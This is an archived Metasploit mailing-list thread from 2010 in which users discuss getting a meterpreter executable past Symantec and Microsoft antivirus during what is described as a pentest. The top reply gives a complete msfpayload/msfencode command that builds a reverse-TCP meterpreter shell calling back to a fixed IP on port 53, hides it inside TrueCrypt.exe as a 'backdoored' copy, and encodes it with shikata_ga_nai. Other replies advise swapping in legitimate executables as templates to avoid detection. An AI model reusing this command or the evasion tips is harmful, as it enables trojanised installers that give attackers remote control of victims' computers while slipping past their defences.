Metasploit mailing list archives

Re: Shikata_ga_nai evasion...


From: netevil <netevil () hackers it>
Date: Sun, 14 Mar 2010 19:33:56 +0100

Here it is, Terrence!

sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.253.128.220
LPORT=53 R | sudo ./msfencode -t exe -x /home/john/pentest/TrueCrypt.exe
-o  /home/john/pentest/TrueCrypt_backdoored.exe -e x86/shikata_ga_nai -c 5


Send the command you are using to generate the payloads.




On Sun, Mar 14, 2010 at 14:24, ricky-lee birtles <mr.r.birtles () gmail com> wrote:
Try using some of the tools from
http://technet.microsoft.com/en-us/sysinternals/default.aspx as
templates.

As well as trying to use a different payload and see if that brings
any different results.
Regards,
-- Mr R Birtles



On 14 March 2010 18:04, netevil <netevil () hackers it> wrote:
Confirmed!..also changing template (TrueCrypt.exe, Mame.exe...)
results don't change...

Davidd


Have you tried using a different .exe template? The default one is
what most AV vendors are using to pick up Metasploit's outputted
exes.

Yes Ricky!
I've tried with an original putty... and this template is a flash movie.
I'm going to do a third test with another template.. and see if
results change...hoping at least for Symantec..

thanks
David


Regards,
-- Mr R Birtles



On 14 March 2010 17:40, NetEvil <netevil () hackers it> wrote:
Hi guys
I'm doing a pentest using my meterpreter exe encoded with shikata ga nai..
and I see it signed as suspicious by Symantec and Microsoft...
Do you have a quick solution for evading these AVs? I've tried some packers
but same results...
If not... I know the hex editor is waiting for me...

Thanks...have a nice sunday!
David


Sent from my mobile device
--------------------------------------
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
